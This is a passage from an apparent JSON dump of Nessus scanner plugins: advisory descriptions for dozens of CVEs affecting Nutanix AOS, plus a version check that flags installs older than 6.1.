platform allows KVM guest\n OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of\n a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue\n affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument\n in some cases where the input length is close to the maximum permissable length for an integer on the\n platform. In such cases the return value from the function call will be 1 (indicating success), but the\n output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to\n OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out\n of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should\n upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based\n on the issuer and serial number data contained within an X509 certificate. However it fails to correctly\n handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is\n maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a\n potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by\n OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on\n certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are\n affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x\n and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving\n public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should\n upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected\n 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of\n this vulnerability can result in unauthorized access to critical data or complete access to all Java SE,\n Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that\n load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3\n (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to\n some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker\n with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker and while the vulnerability is in\n Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete\n access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies\n to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks\n of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM\n Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in\n clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run\n untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This\n vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service\n which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - A flaw was found in the Routing decision classifier in the Linux kernel's Traffic Control networking\n subsystem in the way it handled changing of classification filters, leading to a use-after-free condition.\n This flaw allows unprivileged local users to escalate their privileges on the system. The highest threat\n from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3715)\n\n - An issue was discovered in the Linux kernel before 5.2.6. On NUMA systems, the Linux fair scheduler has a\n use-after-free in show_numa_stats() because NUMA fault statistics are inappropriately freed, aka\n CID-16d51a590a8c. (CVE-2019-20934)\n\n - In the Linux kernel before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c (aka the Xirlink camera USB\n driver) mishandles invalid descriptors, aka CID-a246b4d54770. (CVE-2020-11668)\n\n - The Linux kernel before 5.11.14 has a use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c because\n the CIPSO and CALIPSO refcounting for the DOI definitions is mishandled, aka CID-ad5d07f4a9cd. This leads\n to writing an arbitrary value. (CVE-2021-33033)\n\n - In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an\n hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value. (CVE-2021-33034)\n\n - fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer\n allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an\n unprivileged user, aka CID-8cae8cd89f05. (CVE-2021-33909)\n\n - encoding.c in GNU Screen through 4.8.0 allows remote attackers to cause a denial of service (invalid write\n access and application crash) or possibly have unspecified other impact via a crafted UTF-8 character\n sequence. (CVE-2021-26937)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-\n free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is\n called, aka CID-f5449e74802c. (CVE-2020-36385)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an\n attacker who can convince a victim to install a seemingly verifiable package, whose signature header was\n modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is\n to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - In the Linux kernel before 5.3.9, there are multiple out-of-bounds write bugs that can be caused by a\n malicious USB device in the Linux kernel HID drivers, aka CID-d9d4b1e46d95. This affects drivers/hid/hid-\n axff.c, drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c, drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c, drivers/hid/hid-\n tmff.c, and drivers/hid/hid-zpff.c. (CVE-2019-19532)\n\n - In create_pinctrl of core.c, there is a possible out of bounds read due to a use after free. This could\n lead to local information disclosure with no additional execution privileges needed. User interaction is\n not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-140550171\n (CVE-2020-0427)\n\n - A flaw was found in the Linux kernel. A use-after-free memory flaw was found in the perf subsystem\n allowing a local attacker with permission to monitor perf events to corrupt memory and possibly escalate\n privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as\n system availability. (CVE-2020-14351)\n\n - In the Linux kernel through 5.8.7, local attackers able to inject conntrack netlink configuration could\n overflow a local buffer, causing crashes or triggering use of incorrect protocol numbers in\n ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c, aka CID-1cc5ef91d2ff.\n (CVE-2020-25211)\n\n - A flaw was found in the Linux kernel in versions before 5.9-rc7. Traffic between two Geneve endpoints may\n be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE\n tunnel allowing anyone between the two endpoints to read the traffic unencrypted. The main threat from\n this vulnerability is to data confidentiality. (CVE-2020-25645)\n\n - A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was\n using ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to get read memory access out of\n bounds. The highest threat from this vulnerability is to data confidentiality. (CVE-2020-25656)\n\n - A flaw in ICMP packets in the Linux kernel may allow an attacker to quickly scan open UDP ports. This flaw\n allows an off-path remote attacker to effectively bypass source port UDP randomization. Software that\n relies on UDP source port randomization are indirectly affected as well on the Linux Based Products\n (RUGGEDCOM RM1224: All versions between v5.0 and v6.4, SCALANCE M-800: All versions between v5.0 and v6.4,\n SCALANCE S615: All versions between v5.0 and v6.4, SCALANCE SC-600: All versions prior to v2.1.3, SCALANCE\n W1750D: v8.3.0.1, v8.6.0, and v8.7.0, SIMATIC Cloud Connect 7: All versions, SIMATIC MV500 Family: All\n versions, SIMATIC NET CP 1243-1 (incl. SIPLUS variants): Versions 3.1.39 and later, SIMATIC NET CP 1243-7\n LTE EU: Version (CVE-2020-25705)\n\n - In drivers/target/target_core_xcopy.c in the Linux kernel before 5.10.7, insufficient identifier checking\n in the LIO SCSI target code can be used by remote attackers to read or write files via directory traversal\n in an XCOPY request, aka CID-2896c93811e3. For example, an attack can occur over a network if the attacker\n has access to one iSCSI LUN. The attacker gains control over file access because I/O operations are\n proxied via an attacker-selected backstore. (CVE-2020-28374)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\n - In the Linux kernel 4.14 longterm through 4.14.165 and 4.19 longterm through 4.19.96 (and 5.x before 5.2),\n there is a use-after-free (write) in the i915_ppgtt_close function in drivers/gpu/drm/i915/i915_gem_gtt.c,\n aka CID-7dc40713618c. This is related to i915_gem_context_destroy_ioctl in\n drivers/gpu/drm/i915/i915_gem_context.c. (CVE-2020-7053)\n\n - A flaw was found in the way memory resources were freed in the unix_stream_recvmsg function in the Linux\n kernel when a signal was pending. This flaw allows an unprivileged local user to crash the system by\n exhausting available memory. The highest threat from this vulnerability is to system availability.\n (CVE-2021-20265)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to\n 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP\n upgrade connections was not released for WebSocket connections once the connection was closed. This\n created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions\n (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being\n called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to\n force an invalid signature, causing an assertion failure or possible validation. The highest threat to\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-20305)\n\n - In BIND 9.8.5 -> 9.8.8, 9.9.3 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and\n 9.16.8-S1 -> 9.16.13-S1 of BIND 9 Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11\n of the BIND 9.17 development branch, when a vulnerable version of named receives a malformed IXFR\n triggering the flaw described above, the named process will terminate due to a failed assertion the next\n time the transferred secondary zone is refreshed. (CVE-2021-25214)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through\n 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft\n source code that renders different logic than the logical ordering of tokens ingested by compilers and\n interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such\n that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium\n offers the following alternative approach to presenting this concern. An issue is noted in the nature of\n international text that can affect applications that implement support for The Unicode Standard and the\n Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-\n right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can\n further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such\n that the ordering of tokens perceived by human reviewers does not match what will be processed by a\n compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its\n document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also\n provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode\n Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the\n BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading\n visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows\n privilege escalation because supplemental groups are not initialized as expected. Helper programs for\n AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group\n memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.nutanix.com/advisories/NXSA-AOS-6-1.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the Nutanix AOS software to recommended version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-43527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:nutanix:aos\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nutanix_collect.nasl\");\n script_require_keys(\"Host/Nutanix/Data/lts\", \"Host/Nutanix/Data/Service\", \"Host/Nutanix/Data/Version\", \"Host/Nutanix/Data/arch\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::nutanix::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '6.1', 'product' : 'AOS', 'fixed_display' : 'Upgrade the AOS install to 6.1 or higher.', 'lts' : FALSE },\n { 'fixed_version' : '6.1', 'product' : 'NDFS', 'fixed_display' : 'Upgrade the AOS install to 6.1 or higher.', 'lts' : FALSE }\n];\n\nvcf::nutanix::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-12T21:09:18", "description": "The version of AOS installed on the remote host is prior to 6.1.1. It is, therefore, affected by multiple vulnerabilities as referenced in the NXSA-AOS-6.1.1 advisory.\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21248)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21277, CVE-2022-21366)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2022-21282, CVE-2022-21296)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21283)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: 